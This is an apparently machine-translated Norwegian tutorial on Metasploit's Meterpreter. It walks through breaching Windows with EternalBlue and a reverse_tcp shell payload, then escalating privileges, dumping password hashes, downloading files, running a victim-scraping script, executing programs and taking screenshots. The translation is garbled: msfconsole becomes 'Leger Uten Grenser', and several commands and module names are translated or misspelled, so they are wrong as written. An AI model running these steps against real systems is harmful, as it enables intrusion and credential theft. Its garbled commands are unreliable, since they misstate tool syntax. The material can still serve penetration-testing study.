Etter utnyttelse med meterpreter

Etter utnyttelse med meterpreter
Dette er en introduksjon til meterpreter nyttelast -plugin i Metasploit. I denne korte opplæringen vil vi diskutere hvordan du bruker den til å bruke postutnyttelse på et Windows OS -system når du allerede har brutt det ved å bruke EternalBlue Exploit. Vi vil begrense oss til å få tilgang til Windows -systemet og utforske det, og alle tingene vi skal gjøre vil fokusere på å få tilgang til informasjon og brukeropplysninger.

Introduksjon til meterpreter

Meterpreter er en angreps nyttelast i Metasploit -rammen som lar gjerningsmannen kontrollere og navigere i offerets datamaskin gjennom et kommandoskall. Det kan vise seg å være et veldig allsidig verktøy når det gjelder penetrasjonstesting. Det er et etterutnyttelsesverktøy som er basert på DLL-injeksjon i minnet, noe som betyr at det får den injiserte DLL-kjøringen ved å lage en ny prosess som ber om at systemet skal kjøre den injiserte DLL. Det kan gi deg tilgang til et usynlig kommandobeskall på en offermaskin, og lar deg kjøre kjørbare filer og profilnettverk.

Det ble opprinnelig skrevet for Metasploit 2.X og er oppgradert for Metasploit 3.

Vi vil diskutere bruken av meterpreter i detalj, men før det, la oss ha et ord om nyttelast generelt

Hva er nyttelast?

Nyttelast i Metasploit er moduler, noe som betyr at de er utdrag av koder i Metasploit som kjøres på det eksterne systemet vi målretter. Utnyttelsesmodulen sendes først, som installerer nyttelastmodulen på systemet. Deretter gir nyttelast tilgang til angriperen (begrenset eller fullverdig, avhenger av innholdet i nyttelast). For ytterligere å utdype funksjonen til nyttelast, må vi diskutere dens typer, som er 3 totalt:

Singler

Disse nyttelastene er helt selvstendige, noe som betyr at disse kan være like grunnleggende som portvaktkoder som lar brukeren inn i et målsystem.

Stagers

Stagers er nyttelast som samler applikasjoner i målsystemet og sender det til angriperen. Det etablerer forbindelsen mellom offeret til vår lokale maskin.

Stadier

Når Stagers har tilgang til systemet, laster de ned trinnsmodulene. Trinnsmoduler fjerner størrelseshetten på meterpreter.

Eksempler på stadier vil være et enkelt skall, iPhone 'IPWN' Shell, Meterpreter -moduler, VNC -injeksjon.

Du kan finne ut typen nyttelast ved å finne ut navnet. Enkelt nyttelast er vanligvis av formatet /

Utnyttelse med meterpreter

Først av alt, start Leger Uten Grenser ved å skrive følgende terminalkommando i Kali Terminal -vinduet.

$ SUDO MSFCONSOLE

Vi bruker Reverse_TCP som stager og meterpreter som scenen.

Vi begynner med å sette opp den evige blå utnyttelsen. Velg (MS17_010_eternalBlue) og sett deretter Windows/X64/Meterpreter/Reverse_TCP som den valgte nyttelasten

Konfigurer deretter utnyttelsesinnstillingene og kjør deretter utnyttelsen med Exploit -kommandoen:

$ set nyttelastvinduer/x64/meterpreter/reverse_tcp
$ sett Rhost 192.168.198.136
$ utnyttelse

De EternalBlue utnyttelse har blitt aktivert vellykket.

Etter utnyttelse

Vi får tilgang til og manipulerer det allerede kompromitterte systemet under etterutnyttelsen.

Vi kan gjøre mange ting nå som vi har tilgang til systemet, men som nevnt ovenfor, skal vi være fokusert hovedsakelig på å laste ned informasjon og skaffe brukeropplysning her

Administrere tilgangsprivilegium:

Avhengig av nyttelastmodulen og utnyttelsen du har brukt, kan du bli møtt med visse tilgangsbegrensninger som vil ødelegge dine evner til å manøvrere offermaskinen alvorlig. Du kan komme deg rundt dette problemet med opptrapping av privilegier gjennom å slette passord og tukle med registre. Du kan også eskalere privilegier ved å bruke Meterpreter's Get System -Command.

$ getSystem
$ getuid

Filoverføring med meterpreter

Med Meterpreter kan du laste ned en fil ved hjelp av $ Last ned-kommandoen.

$ Last ned/Windows/System32/Drivere/etc/verter

Tilsvarende kan du også laste opp informasjon til maskinen ved å bruke $ opplastingskommando

Trekk ut brukeropplysning:

Bruk kodeskript Credential_Collector for å trekke ut informasjon om brukerkontoer, eller bruk hash -dump -postmodulen til lignende effekt.

Vi bruker hash -dump -postmodulen for å fortsette med høsting av legitimasjon. Skriv inn følgende MSF -kommando.

$ Run Post/Windows/Samle/Hashdump

Som vi kan se, har vi skaffet oss Coen-, gjeste- og admin -kontoer. LM Hash (admin) og NTLM (gjestenes) hash gjelder tomme passord, mens Coen -hash er et passord som du trenger å knekke. Du kan gjøre det ved å bruke en passord cracker.

Automatisere systemskraping

Det kan være kjedelig å samle informasjon med individuelle inngangsuttalelser at du må fortsette å mate kommandoskallet. Praktisk kan du automatisere denne prosessen med Vineum-manus. Skriptet samler inn informasjon fra offeret og laster ned dataene til vår lokale maskin. Du vil bli fortalt hvor utdataene blir lagret, som du kan se i fjerde linje ovenfra:

$ Run Wineum

Husk at banen der utgangen til hver kommando er lagret, kan være annerledes enn den på skjermen her.

Lar oss rote litt mer

Utføre filer

Du kan kjøre hvilken som helst fil på systemet ved å bruke: Execute -F . Dette inkluderer både kjørbare filer og programmer med flere støttefiler. For eksempel, for å kjøre den innebygde kalkulator -appen i Windows OS, skriv ut Execute -f Calc.EXE

Tar skjermbilder

Du kan også fange skjermbilder fra brukerens synspunkt. Bare skriv skjermbilde i Meterpreter's Command Shell, så får du et skjermbilde av displayet på systemet.

$ execute -f Calc.EXE
$ skjermbilde

Konklusjon:

Dette har vært en kort introduksjon til meterpreter -plugin i Metasploit -rammen, sammen med en kort guide som viser det er mest grunnleggende bruksområder. Vi har her lært hvordan vi kan bryte et Windows OS-system med EternalBlue utnyttelse for å få tilgang, deretter bruke Meterpreter for å eskalere privilegier, samle informasjon manuelt og ved automatiserende Vineus-kommando. Vi har også lært hvordan du utfører filer på offermaskinen.

Meterpreter kan tjene som et nevneverdig middel for sårbarhetsdeteksjon, til tross for at de er en konglomerasjon av grunnleggende verktøy innen Metasploits rammeverk.